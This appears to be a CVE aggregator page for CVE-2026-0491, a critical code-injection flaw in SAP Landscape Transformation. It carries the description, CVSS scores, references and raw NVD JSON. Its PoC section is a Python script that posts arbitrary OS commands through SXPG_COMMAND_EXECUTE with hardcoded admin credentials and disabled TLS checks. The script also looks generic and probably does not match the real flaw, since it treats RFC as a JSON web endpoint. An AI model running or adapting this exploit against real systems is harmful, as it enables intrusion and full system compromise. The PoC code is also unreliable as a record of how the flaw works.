CVE-2026-0491

Description

SAP Landscape Transformation allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SAP Landscape Transformation所有版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-0491 PoC
# Target: SAP Landscape Transformation RFC Interface

def exploit_rce(target_url, command):
    headers = {
        'Content-Type': 'application/json',
        'Authorization': 'Basic YWRtaW46cGFzc3dvcmQ='  # admin:password
    }
    payload = {
        'method': 'SXPG_COMMAND_EXECUTE',
        'params': {
            'COMMANDNAME': command
        }
    }
    response = requests.post(target_url, json=payload, headers=headers, verify=False)
    return response.text

if __name__ == '__main__':
    if len(sys.argv) != 3:
        print('Usage: python cve-2026-0491.py <target_url> <command>')
        sys.exit(1)
    target = sys.argv[1]
    cmd = sys.argv[2]
    result = exploit_rce(target, cmd)
    print(result)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0491
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0491
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0491/
[4] VulDB https://vuldb.com/cve/CVE-2026-0491
[5] https://me.sap.com/notes/3697979
[6] https://url.sap/sapsecuritypatchday

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0491", "sourceIdentifier": "[email protected]", "published": "2026-01-13T02:15:50.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SAP Landscape Transformation allows an attacker with admin privileges to exploit a vulnerability in the function module exposed via RFC. This flaw enables the injection of arbitrary ABAP code/OS commands into the system, bypassing essential authorization checks. This vulnerability effectively functions as a backdoor, creating the risk of full system compromise, undermining the confidentiality, integrity and availability of the system."}, {"lang": "es", "value": "SAP Landscape Transformation permite a un atacante con privilegios de administrador explotar una vulnerabilidad en el módulo de función expuesto a través de RFC. Este fallo permite la inyección de código ABAP/comandos del sistema operativo arbitrarios en el sistema, eludiendo las comprobaciones de autorización esenciales. Esta vulnerabilidad funciona eficazmente como una puerta trasera, creando el riesgo de compromiso total del sistema, socavando la confidencialidad, integridad y disponibilidad del sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://me.sap.com/notes/3697979", "source": "[email protected]"}, {"url": "https://url.sap/sapsecuritypatchday", "source": "[email protected]"}]}}